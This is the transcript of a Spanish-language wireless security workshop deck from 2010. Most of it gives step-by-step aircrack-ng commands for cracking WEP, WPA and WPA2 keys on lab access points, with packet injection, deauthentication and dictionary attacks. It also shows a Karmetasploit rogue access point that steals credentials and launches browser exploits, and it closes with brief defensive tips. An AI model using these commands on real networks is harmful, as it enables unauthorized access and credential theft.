workshop seguridad wireless
DESCRIPTION
Taller altamente practico, dictado por Jaime Andres Restrepo (DragonJAR), para asistentes al iSummit Loxa 2010, sobre seguridad en redes inalambricas.TRANSCRIPT
Workshop Seguridad Inalámbrica
Jaime Andrés Restrepo
Agenda del Workshop
• ¿Cuál es tu SSID?
• ¿Porqué el WorkShop?
• ¿Como vamos a trabajar?
• Manos a la Obra!!
¿Cuál es tu SSID?
Jaime
Andrés
María
Valentina
Jairo ……
¿Por que el Workshop? • Gran porcentaje de implementaciones
inalámbricas.
• Poco interés por la seguridad en redes inalámbricas, en entornos caseros y empresariales.
• Desconocimiento de los problemas de seguridad en redes inalámbricas
¿Cómo vamos a Trabajar?
• GRUPO II ���SSID: (WEP-II, WEP-ST-II, WPA-II, WPA2-II) ���Mac: F0:7D:68:52:AA:07
• GRUPO I ���SSID: (WEP, WEP-ST, WPA, WPA2) ���Mac: 00:1B:11:3A:B6:9D
Manos a la obra!! • Inicia la maquina virtual o
introduce el DVD
• Ingresa el usuario root y clave toor, luego startx
• Conecta la memoria Wireless USB, si la tienes.
Si no tienes una tarjeta compatible.. No te preocupes
WEP
start-network
iwconfig
Iniciando la red y configurando la
tarjeta
airmon-ng start wlan0
Ponemos nuestra tarjeta inalámbrica en modo monitor.
airodump-ng mon0
Iniciamos una captura general de
trafico, para identificar las redes
activas a las que tenemos alcance.
Con los resultados del comando anterior, podemos identificar varias redes e información que será muy importante para poder descifrar la clave de la red inalámbrica.
airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0
Ponemos nuestra tarjeta inalámbrica a
capturar la información
especifica que nos interesa, de la red
inalámbrica que seleccionamos
anteriormente.
Iniciamos la captura y podemos ver los usuarios conectados, cuantos paquetes ha enviado y capturamos esos paquetes en el archivo WEP.cap
aircrack-ng WEP-01.cap
Ejecutamos el aircrack para sacar la
clave de la red, que se encuentra en los
paquetes que capturamos
anteriormente.
Clave: weppw
Clave en HEXA
En la anterior captura, es en un entorno donde hay clientes conectados y
haciendo uso de la red.
Pero… ¿y si no hay trafico?
Identificamos la red que deseamos
auditar y obtenemos la información que
será importante para poder descifrar
la clave de la red inalámbrica.
Si hay clientes pero no hay trafico
Pocos datos
Identificamos un cliente conectado a la red, pero no esta
navegando y no conseguimos muchos
datos.
Pocos datos y solo 12 IVs (vector de inicialización), necesitaremos al menos 5000
Intentamos crackear la clave con los pocos
paquetes que logramos conseguir y
nos dice que necesitamos muchos
mas paquetes ¿Qué hacemos?
airodump-ng -c 6 --bssid MACROUTER -w WEP-ST mon0
Como el cliente que tenemos conectado
a la red, no esta navegando, vamos a
capturar algún paquete que envié el cliente, suplantarlo y
reenviarlo muchas veces trafico al
router.
aireplay-ng -3 -b MACROUTER -h MACCLIENTE mon0
Logramos una buena cantidad de datos
Conseguimos capturar un paquete
del cliente y repetirlo muchas
veces para generar trafico suplantando
el cliente legitimo ante el router.
Paquetes que inyectamos
28059 IVs, contra 12 que teníamos….
Después de inyectar todos esos
paquetes, ya contamos con los
suficientes vectores para crackear la clave como ya lo
hicimos anteriormente.
aircrack-ng WEP-ST-01.cap
¿Puedo automatizar todos estos procesos?
cd /pentest/wepbuster/ ./wepbuster
Wesside-ng –i mon0
WepBuster – Wesside-NG
WPA
airodump-ng mon0
Iniciamos una captura general de
trafico, para identificar las redes
WPA activas a las que tenemos
alcance.
Ponemos nuestra tarjeta inalámbrica a
capturar la información
especifica que nos interesa, de la red
inalámbrica que seleccionamos
anteriormente.
airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0
Iniciamos la captura y
podemos ver los usuarios
conectados, cuantos paquetes
ha enviado y capturamos esos
paquetes en el archivo WPA.cap
Tenemos muy buenos datos, pero…
Al ejecutar aircrack-ng WPA-01.cap, nos encontramos con 0 handshake
Como WPA se crackea, por
fuerza bruta y no descifrando la
clave como WEP, no nos importa los
datos sino el “apretón de
manos” inicial entre el pc y el
router (handshake)
Ponemos a capturar…
airepaly-ng -0 1 –a MACROUTER –c MACCLIENTE mon0
En esta ocasión lo que nos importa es
capturar por la el “apretón de manos”
donde se ponen de acuerdo cliente y
servidor de la forma en que trabajaran,
esta información la usaremos para
crackear la clave wifi por fuerza bruta.
aircrack-ng WPA-01.cap
Lanzamos el aircrack a el archivo .cap
generado, para verificar que
efectivamente contemos con el
handshake (apretón de
manos) y podemos empezar a lanzar
el ataque de fuerza bruta.
aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 00:1B:3A:B6:9D WPA-01.cap
Lanzamos el ataque de fuerza
bruta con el diccionario que
trae incorporado el backtrack y
esperamos que alguna de las claves
que estén en el, sea la del router.
Después de casi 14 minutos, obtenemos la clave del router, que en este caso era !n5en5!7!v!7y
KEY FOUND!, encontramos la
clave de la red WPA, después ya
que afortunadamente
estaba en el diccionario de password que
utilizamos.
WPA2 ���básicamente lo mismo que WPA
airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE
mon0
airodump-ng mon0
airepaly-ng -0 1 –a MACROUTER –c
MACCLIENTE mon0
aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst -b 00:1B:
11:3A:B6:9D WPA2-01.cap
Paramos el ataque de des autenticación y
verificamos que tenemos el handshake
Iniciamos el crackeo de la contraseña por fuerza bruta
Después de casi 2 horas, obtenemos la clave del router, que en este caso era ecuatoriano
KEY FOUND!, encontramos la
clave de la red WPA2, ya que
afortunadamente estaba en el
diccionario de password que
utilizamos.
¿Puedo automatizar todos estos procesos?
WiFite Consola GUI
http://code.google.com/p/wifite/
Que hago después de entrar a la red…
vacío
admin
www.routerpasswords.com
Pero también podemos… • Escanear la red en busca de equipos con
información o vulnerables.
• Lanzar un ataque ARP Spoofing para capturar los datos que corren por esa red inalámbrica.
• Usar su infraestructura, impresoras, conexión a internet y aplicaciones locales.
• Cualquier otra cosa que se nos ocurra…
EXTRAS
AirPwn
airpwn
Framework wireless que
permite inyectar paquetes
entrantes, que encajen con un
patrón que definamos en el
archivo de configuración.
airpwn –d DRIVER –i mon0 –k CLAVEWEPHEXA –c
CONFIGURACION –vvv -F
Iniciamos la herramienta con
una configuración personalizada que
nos permitirá reemplazar
cualquier petición HTTP del cliente
por la nuestra.
Ataque en ejecución.
Resultado del ataque
Karmetasploit
airmon-ng start wlan0
Airbase-ng –P –C 30 –e ^”WPA” –v mon0
Ponemos nuestra tarjeta en modo
monitor e iniciamos un
accesspoint con un essid conocido…
nano /etc/dhcp3/dhcpd.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
/etc/init.d/dhcp3-server start
wget http://digitaloffense.net/tools/karma.rc
./msfconsole –r karma.rc
Descargamos el karmetasploit de
la pagina oficial, lo ejecutamos y
esperamos que cargue
completamente
Oye tu eres mi
red?
Claro yo soy tu red
Comunícame por fa con
pop.hotmail.com
Yo soy pop.hotmail.com,
¿cual es tu usuario y clave?
Mi usuario es inocencia y mi clave 123456
Muchas gracias inocencia, espera yo
verifico tus datos
Atacante Victima
El resultado que veremos en los clientes que se conecten a nuestro falso access point, depende de los servicios que le solicite el cliente al karmetasploit. Si solicita un cliente pop3,ftp,dns,smb, simula ser uno y almacena los datos que proporcione el cliente en la base de datos karma.db Si hacemos una petición http en cambio nos ejecuta el modulo browser_autopwn del metasploit, para tratar de explotar alguna vulnerabilidad en nuestro navegador y conseguir una shell en el sistema.
¿Como nos protegemos?
¿Como podemos protégenos? • Cambiar clave por defecto y SSID
(preferiblemente ocúltelo) al router
• Usar WPA o WPA2 con clave fuerte.
• Realizar Filtrado por Mac y limitar el numero de conexiones
• Bajar la potencia a nuestro router
• Apagar el router cuando no���se utilice
• Usar pintura DefendAir
Cifrado: ???
Cifrado: ???
Cifrado: ???